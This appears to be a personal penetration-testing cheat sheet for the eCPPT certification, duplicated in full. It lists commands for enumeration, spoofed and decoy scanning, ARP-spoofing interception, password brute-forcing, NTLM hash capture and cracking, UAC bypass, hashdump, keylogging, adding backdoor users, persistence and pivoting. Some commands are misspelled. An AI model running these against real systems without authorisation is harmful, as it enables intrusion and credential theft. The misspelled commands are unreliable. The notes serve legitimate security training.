JPMonglis/ecppt_net.txt

## ecppt_net.txt
eCPPT NETWORK SECURITY

*DNS Enumeration

nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain

     interactime mode  {
     set q=ns domain
     set q=mx domain
     set q=cname domain
     }

dig domain
dig domain A
dig domain NS
dig +nocmd domain MX +noall +answer
dig +nocmd domain MX +noall +answer
dig +nocmd domain AXFR +noall +answer @vulnDNS

fierce -dns domain
fierce -dns domain -dnsserver vuln.DNS

dnsenum domain
dnsenum domain --dnsserver vuln.DNS
dnsenum domain -f host.list

dnsmap domain
dnsrecon -d domain

*NETBIOS
windows commands

nbtstat -A $IP
net view $IP
net use /?
net use \\resource\path

** net bios auditing tool **
nat.exe -u userlist -p passwordlist $IP
winfingerprint GUI tool

NULLSESSION
net use \\source\ipc$ "" /user:"

SID2USER (replace - with "  " )
sid2user.exe \\source $SID
sid2user.exe \\source $SID 500 (admin)
sid2user.exe \\source $SID 501 (guest)
sid2user.exe \\source $SID 1000 (account created by user)

dumpsec GUI tool

linux commands

*polenum
*ldapscripts

enum4linux -a -v $IP
smbclient -L $IP
smbclient \\\\$IP\\folderToAccess

*SNMP Enumeration

snmpwalk -h
snmpwalk -v -2c -c public $IP
snmpwalk -v -2c -c public $IP hrSWInstalledName
snmpwalk -v -2c -c public $IP hrMemorySize
snmpwalk -v -2c -c public $IP sysContact

snmpset -v -2c -c public $IP sysContant.0 s value
nmap -sU -p 161 --script snmp-win32-service $IP
nmap -SU -p 161 --script snmp-brute $IP
nmap -SU -p 161 --script snmp-win32-users $IP

SCANNING

*Idle Hping & nmap command

hping3 -S -r $IP -p 135 # syn scan
if the target response with id +1 , that makes him a good zombie, in general status id must be incemented

hping3 -a $ZIP -S $VIP -p 23  #spoof IP
zip = zombie , vip = victim...if the target response id +2 the 23 is open

nmap --script ipdseq $IP -p 135
checks if the id status is incresed
nmap -O -v $IP -p 135

nmap -sI $zip:135 $vip -p 23 --packet-trace
zombie idle scan (-sI)

hping3 -S -r $vip -p 135      +
nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping
if the target response with incemented id then the port is open

*NMAP scan and NSE scripting

nmap --script-help "smb" and discovery
how to search for nse scripts

nmap --script auth $IP
runs all auth nse scripts
nmap --script default $IP

nmap -f  $vip -n -p80 --disable-arp-ping -Pn
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48
every fragment is sized of 8bytes
nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping
(every fragment is sized of 16bytes)

*Using Decoys (popular idle scans)

nmap -p 80 -D $dec1,ME,dec2 $vip
nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping
hping3 --rand-source -S -p 80 $vip -c 3
hping3 -a $spoofIP -S -p 80 $vip
nmap --source-port 53 $vip -sS
dns is mostly accepted in firewalls
hping3 -S -s 53 --scan known $vip
nmap -sS --data-lenght 10 -p 21 $vip
hping3 -S -p 21 --data 24 $vip
nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2
hping3 -1 --rand-dest 192.168.1.x -I eth0
hping3 --scan 80,443,21,22 $vip -i u10

Man In The Middle  ATTACKS

*SNIFFING TRAFFIC

tcpdump --help
tcpdump -D          // list interfaces
tcpdump -i eth0
tcpdump -i eth0 -v
tcpdump -i eth0 -n          //disable dns resolution
tcpdump -i eth0 -q          //quite option
tcpdump -i eth0 host $IP          //sniff spesific host or IP
tcpdump -i eth0 src $sourceaddr dst $destinaddr
tcpdump -i eth0  -F filter.file          //file that conainer [port No]
tcpdump -i eth0 -c 150          //packets we want to capture
tcpdump -i eth0 -w output_file.txt          //save output
tcpdump -i eth0 -r output_file.txt          //read output
tcpdump -i eth0 | grep $IP

*MITM

Promiscuise mode allow network interface card to accept and process all packets receive
Switch forward traffic only to the asked destination
ettercap
bettercap
mitmf
sslstrip

//enable ip forwarded
echo 1 > /proc/sys/net/ipv4/ip_forward

//arp spoofing [2 way] [
     arpsoof -i eth0 -t $targetIP $impersonateIP
     arpsoof -i eth0 -t $impersonateIP $targetIP
]

dsniff -i eth0          //grabs basic auth credentials

bettercap -h
bettercap -I eth0 -X -G $target1 -T $target2ip          //sniffing mode

EXPLOITATION

*Auth Bruteforce

ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet
medusa -h 192.168.1.1 -M ssh -U userlist -P passlist
hydra -L userlist -P passlist ssh://192.168.1.1
hydra -L userlist -P passlist ssh://192.168.1.1 -T 50
patator ftp_login -help
patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Login incorrect"
patator ssh_login host=192.168.1.1 user="test" password="test"
patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"
patator telnet_login inputs="FILE0\nFILE1\n" host= 192.168.1.1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"

*LM_NTLM crack

use auxilirary/server/capture/smb
set JOHNPWFILE hashes

rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti        // we need wanbow table file , 8 bytes of LM hash (16chars) -t =>(thread)

netntlm --file /file/challenge_response --seed passdiscovered           // recovers (if cracked) the password
netntlm --file /file/challenge_response --seed fullpass                         // case sensitive

POST EXPLOITATION

*Privileges Escalation on Windows

> sysinfo
> getprivs           // list session priveleges
> run post/windows/gather/win_privs           // list all machine privileges and UAC status
use epxloit/windows/local/bypassuac_injection           // try to bypass the UAC

- exploit suggester

//external tools
UACme

*Privileges Escalation on Linux

sysinfo

- exploit suggester

> execute -f /bin/sh -i -c           // create a new channel and interacts with it

*Maintaine Access & persistance
     (inside meterpreter)

- migration to another service
- hashdump OR post /windows/gather/smart_hashdump
- psexec

Adding new user to remote system

- run getgui -e -u user -p pass         //adding new user via RDP and enabled  (connect via [ xfreerdp /v:$IP /u:$user /p:$pass
- exploit/windows/local/persistence

*Pillaling

shell    > systeminfo
mptr     > post/windows/gather/*
         > search -f *.kdb -r -d           //searching for specific info
         > post/windows/capture/*      //keyloger
shell    > ipconfig /all
    #    > route OR+AND arp
    #    > netstat -ano
    #    > wmic ?
    #    > wmic service /?
    #    > wmic service get [caption,started]
    #    > wmic service where started=true get caption

*Mapping Internal network

shell     > ipconfig /all
mtrp      > arp & route
shell     > ipconfig /displaydns
     #    > netstat -ano
     #    > netstat -b
msf       > post/multi/gather/ping_sweep
mtpr      > run arp_scan -r $IP/*
msf       > post/windows/manage/autoroute          // adding route so can scan internal network
     #    > auxiliary/server/socks4a                         // configure socks proxy ( edite proxyxhains )
mtpr      > portfwd add -l 8080 -p 80 -r $Remote IP          // l = local port , p = remote port , r = remote host
	eCPPT NETWORK SECURITY

	*DNS Enumeration

	nslookup example.com
	nslookup -query=mx domain
	nslookup -query=ns domain
	nslookup -query=any domain

	interactime mode {
	set q=ns domain
	set q=mx domain
	set q=cname domain
	}

	dig domain
	dig domain A
	dig domain NS
	dig +nocmd domain MX +noall +answer
	dig +nocmd domain MX +noall +answer
	dig +nocmd domain AXFR +noall +answer @vulnDNS

	fierce -dns domain
	fierce -dns domain -dnsserver vuln.DNS

	dnsenum domain
	dnsenum domain --dnsserver vuln.DNS
	dnsenum domain -f host.list

	dnsmap domain
	dnsrecon -d domain

	*NETBIOS
	windows commands

	nbtstat -A $IP
	net view $IP
	net use /?
	net use \\resource\path

	net bios auditing tool
	nat.exe -u userlist -p passwordlist $IP
	winfingerprint GUI tool

	NULLSESSION
	net use \\source\ipc$ "" /user:"

	SID2USER (replace - with " " )
	sid2user.exe \\source $SID
	sid2user.exe \\source $SID 500 (admin)
	sid2user.exe \\source $SID 501 (guest)
	sid2user.exe \\source $SID 1000 (account created by user)

	dumpsec GUI tool

	linux commands

	*polenum
	*ldapscripts

	enum4linux -a -v $IP
	smbclient -L $IP
	smbclient \\\\$IP\\folderToAccess

	*SNMP Enumeration

	snmpwalk -h
	snmpwalk -v -2c -c public $IP
	snmpwalk -v -2c -c public $IP hrSWInstalledName
	snmpwalk -v -2c -c public $IP hrMemorySize
	snmpwalk -v -2c -c public $IP sysContact

	snmpset -v -2c -c public $IP sysContant.0 s value
	nmap -sU -p 161 --script snmp-win32-service $IP
	nmap -SU -p 161 --script snmp-brute $IP
	nmap -SU -p 161 --script snmp-win32-users $IP

	SCANNING

	*Idle Hping & nmap command

	hping3 -S -r $IP -p 135 # syn scan
	if the target response with id +1 , that makes him a good zombie, in general status id must be incemented

	hping3 -a $ZIP -S $VIP -p 23 #spoof IP
	zip = zombie , vip = victim...if the target response id +2 the 23 is open

	nmap --script ipdseq $IP -p 135
	checks if the id status is incresed
	nmap -O -v $IP -p 135

	nmap -sI $zip:135 $vip -p 23 --packet-trace
	zombie idle scan (-sI)

	hping3 -S -r $vip -p 135 +
	nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping
	if the target response with incemented id then the port is open

	*NMAP scan and NSE scripting

	nmap --script-help "smb" and discovery
	how to search for nse scripts

	nmap --script auth $IP
	runs all auth nse scripts
	nmap --script default $IP

	nmap -f $vip -n -p80 --disable-arp-ping -Pn
	nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100
	nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48
	every fragment is sized of 8bytes
	nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping
	(every fragment is sized of 16bytes)

	*Using Decoys (popular idle scans)

	nmap -p 80 -D $dec1,ME,dec2 $vip
	nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping
	hping3 --rand-source -S -p 80 $vip -c 3
	hping3 -a $spoofIP -S -p 80 $vip
	nmap --source-port 53 $vip -sS
	dns is mostly accepted in firewalls
	hping3 -S -s 53 --scan known $vip
	nmap -sS --data-lenght 10 -p 21 $vip
	hping3 -S -p 21 --data 24 $vip
	nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n
	nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n
	nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n
	nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts
	nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2
	hping3 -1 --rand-dest 192.168.1.x -I eth0
	hping3 --scan 80,443,21,22 $vip -i u10

	Man In The Middle ATTACKS

	*SNIFFING TRAFFIC

	tcpdump --help
	tcpdump -D // list interfaces
	tcpdump -i eth0
	tcpdump -i eth0 -v
	tcpdump -i eth0 -n //disable dns resolution
	tcpdump -i eth0 -q //quite option
	tcpdump -i eth0 host $IP //sniff spesific host or IP
	tcpdump -i eth0 src $sourceaddr dst $destinaddr
	tcpdump -i eth0 -F filter.file //file that conainer [port No]
	tcpdump -i eth0 -c 150 //packets we want to capture
	tcpdump -i eth0 -w output_file.txt //save output
	tcpdump -i eth0 -r output_file.txt //read output
	tcpdump -i eth0 \| grep $IP

	*MITM

	Promiscuise mode allow network interface card to accept and process all packets receive
	Switch forward traffic only to the asked destination
	ettercap
	bettercap
	mitmf
	sslstrip

	//enable ip forwarded
	echo 1 > /proc/sys/net/ipv4/ip_forward

	//arp spoofing [2 way] [
	arpsoof -i eth0 -t $targetIP $impersonateIP
	arpsoof -i eth0 -t $impersonateIP $targetIP
	]

	dsniff -i eth0 //grabs basic auth credentials

	bettercap -h
	bettercap -I eth0 -X -G $target1 -T $target2ip //sniffing mode

	EXPLOITATION

	*Auth Bruteforce

	ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet
	medusa -h 192.168.1.1 -M ssh -U userlist -P passlist
	hydra -L userlist -P passlist ssh://192.168.1.1
	hydra -L userlist -P passlist ssh://192.168.1.1 -T 50
	patator ftp_login -help
	patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Login incorrect"
	patator ssh_login host=192.168.1.1 user="test" password="test"
	patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"
	patator telnet_login inputs="FILE0\nFILE1\n" host= 192.168.1.1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"

	*LM_NTLM crack

	use auxilirary/server/capture/smb
	set JOHNPWFILE hashes

	rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // we need wanbow table file , 8 bytes of LM hash (16chars) -t =>(thread)

	netntlm --file /file/challenge_response --seed passdiscovered // recovers (if cracked) the password
	netntlm --file /file/challenge_response --seed fullpass // case sensitive

	POST EXPLOITATION

	*Privileges Escalation on Windows

	> sysinfo
	> getprivs // list session priveleges
	> run post/windows/gather/win_privs // list all machine privileges and UAC status
	use epxloit/windows/local/bypassuac_injection // try to bypass the UAC

	- exploit suggester

	//external tools
	UACme

	*Privileges Escalation on Linux

	sysinfo

	- exploit suggester

	> execute -f /bin/sh -i -c // create a new channel and interacts with it

	*Maintaine Access & persistance
	(inside meterpreter)

	- migration to another service
	- hashdump OR post /windows/gather/smart_hashdump
	- psexec

	Adding new user to remote system

	- run getgui -e -u user -p pass //adding new user via RDP and enabled (connect via [ xfreerdp /v:$IP /u:$user /p:$pass
	- exploit/windows/local/persistence

	*Pillaling

	shell > systeminfo
	mptr > post/windows/gather/*
	> search -f *.kdb -r -d //searching for specific info
	> post/windows/capture/* //keyloger
	shell > ipconfig /all
	# > route OR+AND arp
	# > netstat -ano
	# > wmic ?
	# > wmic service /?
	# > wmic service get [caption,started]
	# > wmic service where started=true get caption

	*Mapping Internal network

	shell > ipconfig /all
	mtrp > arp & route
	shell > ipconfig /displaydns
	# > netstat -ano
	# > netstat -b
	msf > post/multi/gather/ping_sweep
	mtpr > run arp_scan -r $IP/*
	msf > post/windows/manage/autoroute // adding route so can scan internal network
	# > auxiliary/server/socks4a // configure socks proxy ( edite proxyxhains )
	mtpr > portfwd add -l 8080 -p 80 -r $Remote IP // l = local port , p = remote port , r = remote host